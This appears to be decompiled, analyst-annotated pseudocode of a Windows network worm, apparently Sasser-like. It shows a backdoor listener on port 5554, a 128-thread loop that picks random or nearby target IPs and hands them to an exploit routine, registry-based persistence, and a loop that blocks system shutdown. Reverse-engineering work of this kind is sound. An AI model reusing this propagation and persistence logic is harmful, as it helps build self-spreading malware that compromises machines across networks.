      if ( v29 <= 0 )
      {
        closesocket(lpThreadParameter);
        return 0;
      }
      socket = lpThreadParameter;
    }
  }
  return 0;
}
// 401B03: could not find valid save-restore pair for edi
// 401B1A: variable 'v1' is possibly undefined
// 401E35: using guessed type _DWORD __cdecl sub_401E35(_DWORD);
// 405020: using guessed type int (__stdcall *dword_405020)(_DWORD);
// 40502C: using guessed type int dword_40502C;
// 405030: using guessed type int (__stdcall *dword_405030)(_DWORD);
// 405034: using guessed type int (__stdcall *dword_405034)(_DWORD, _DWORD, _DWORD, _DWORD);
// 4050DC: using guessed type int (*mw_possible_sprintf)(_DWORD, const char *, ...);

//----- (00401E35) --------------------------------------------------------
int __cdecl mw_get_number_from_str(char *str)
{
  int v2; // edi
  int v3; // ecx

  v2 = 0;
  while ( *str == ' ' || *str == '\t' )
    ++str;
  while ( isalnum(*str) )
  {
    v3 = *str++;
    v2 = v3 + 10 * v2 - '0';
  }
  return v2;
}

//----- (00401E6A) --------------------------------------------------------
int __stdcall mw_listen(int a1)
{
  SOCKET v1; // edi
  SOCKET v3; // eax
  struct sockaddr name; // [esp+8h] [ebp-14h] BYREF
  int v5; // [esp+18h] [ebp-4h] BYREF

  v1 = socket(2, 1, 0);                         // AF_INET, SOCK_STREAM, <service provider chooses protocol>
  if ( v1 != -1 )
  {
    name.sa_family = 2;
    *name.sa_data = htons(5554u);
    *&name.sa_data[2] = 0;
    if ( bind(v1, &name, 16) != -1 && listen(v1, 5) != -1 )
    {
      while ( 1 )
      {
        v3 = accept(v1, 0, 0);
        mw_CreateThread(0, 0, mw_process_incoming_data, v3, 0, &v5);
        mw_sleep(25);
      }
    }
    closesocket(v1);
  }
  return 0;
}
// 401E6A: using guessed type int __stdcall mw_listen(int);
// 40501C: using guessed type int (__stdcall *mw_sleep)(_DWORD);
// 405038: using guessed type int (__stdcall *CreateThread)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

//----- (00401EF5) --------------------------------------------------------
void __noreturn mw_main_attack_loop()
{
  void (*mw_sprintf)(char *, const char *, ...); // ebp
  __int16 mw_local_IP_converted; // ax
  int v2; // edi
  int v3; // ebx
  int oct4; // [esp-10h] [ebp-74h]
  int v5; // [esp-Ch] [ebp-70h]
  int oct3; // [esp-Ch] [ebp-70h]
  int v7; // [esp-8h] [ebp-6Ch]
  int oct2; // [esp-8h] [ebp-6Ch]
  int v9; // [esp-4h] [ebp-68h]
  int oct1; // [esp-4h] [ebp-68h]
  char mw_target_IP[28]; // [esp+10h] [ebp-54h] BYREF
  char local_ip[56]; // [esp+2Ch] [ebp-38h] BYREF

  mw_sprintf = mw_sprintf_ptr;
  while ( 1 )
  {
    mw_get_local_IP(local_ip);
    mw_local_IP_converted = inet_addr(local_ip);
    v2 = mw_local_IP_converted + ((mw_local_IP_converted & 0x80u) != 0 ? 0x100 : 0);
    v3 = SHIBYTE(mw_local_IP_converted) + (mw_local_IP_converted < 0 ? 0x100 : 0);
    if ( mw_random_number() % 31 <= 15 )        // force full random
    {
      oct1 = mw_random_number() % 255;
      oct2 = mw_random_number() % 255;
      oct3 = mw_random_number() % 255;
      oct4 = mw_random_number() % 255;
      mw_sprintf(mw_target_IP, aIIII, oct4, oct3, oct2, oct1);
    }
    else
    {
      if ( mw_random_number() % 31 <= 15 )      // /16
      {
        v9 = mw_random_number() % 255;
        v7 = mw_random_number() % 255;
        v5 = v3;
      }
      else                                      // /8
      {
        v9 = mw_random_number() % 255;
        v7 = mw_random_number() % 255;
        v5 = mw_random_number() % 255;
      }
      mw_sprintf(mw_target_IP, aIIII, v2, v5, v7, v9);
    }
    mw_use_correct_exploit(mw_target_IP);
    mw_sleep(250);
  }
}
// 401EF5: using guessed type void __noreturn mw_main_attack_loop();
// 40501C: using guessed type int (__stdcall *mw_sleep)(_DWORD);
// 4050DC: using guessed type int (*mw_sprintf_ptr)(_DWORD, const char *, ...);

//----- (00401FEA) --------------------------------------------------------
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // eax
  void (__stdcall *v6)(_DWORD, _DWORD, void (__noreturn *)(), _DWORD, _DWORD, char *); // edi
  int v7; // ebx
  char v8[4]; // [esp+4h] [ebp-8h] BYREF
  char v9[4]; // [esp+8h] [ebp-4h] BYREF

  v4 = mw_GetTickCount();
  mw_srand(v4);
  mw_persistence(1);
  mw_WSAStartup();
  mw_CreateMutexA(0, 0, aJobaka3l);
  if ( mw_GetLastError() != ERROR_ALREADY_EXISTS )
  {
    v6 = mw_CreateThread;
    mw_CreateThread(0, 0, mw_listen, 0, 0, v9);
    v7 = 128;
    do
    {
      v6(0, 0, mw_main_attack_loop, 0, 0, v8);
      --v7;
    }
    while ( v7 );
    while ( 1 )
    {
      mw_AbortSystemShutDownA(0);
      mw_sleep(3000);
    }
  }
  return 0;
}
// 401E6A: using guessed type int __stdcall mw_listen(int);
// 401EF5: using guessed type void __noreturn mw_main_attack_loop();
// 405000: using guessed type int (__stdcall *dword_405000)(_DWORD);
// 40501C: using guessed type int (__stdcall *mw_sleep)(_DWORD);
// 405038: using guessed type int (__stdcall *mw_CreateThread)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 405040: using guessed type int (__stdcall *mw_CreateMutexA)(_DWORD, _DWORD, _DWORD);

//----- (00402071) --------------------------------------------------------
void __cdecl mw_persistence(char mw_should_copy)
{
  DWORD v1; // eax
  char v2[1024]; // [esp+4h] [ebp-824h] BYREF
  char dstPath[1056]; // [esp+404h] [ebp-424h] BYREF
  HKEY key; // [esp+824h] [ebp-4h] BYREF

  mw_GetModuleFileNameA(0, v2, 0x400u);
  mw_GetWindowsDirectoryA(dstPath, 0x400u);
  if ( v2[strlen(dstPath) + 1023] != 92 )
    strcat(dstPath, asc_406AB0);
  strcat(dstPath, off_4068C8);
  if ( mw_should_copy )
    mw_CopyFileA(v2, dstPath, 0);
  mw_RegCreateKeyA(HKEY_LOCAL_MACHINE, aSoftwareMicros, &key);
  v1 = strlen(dstPath);
  mw_RegSetValueExA(key, off_4068C8, 0, 1u, dstPath, v1);
  mw_RegCloseKey(key);
}

// nfuncs=82 queued=17 decompiled=17 lumina nreq=0 worse=0 better=0
// ALL OK, 17 function(s) have been successfully decompiled
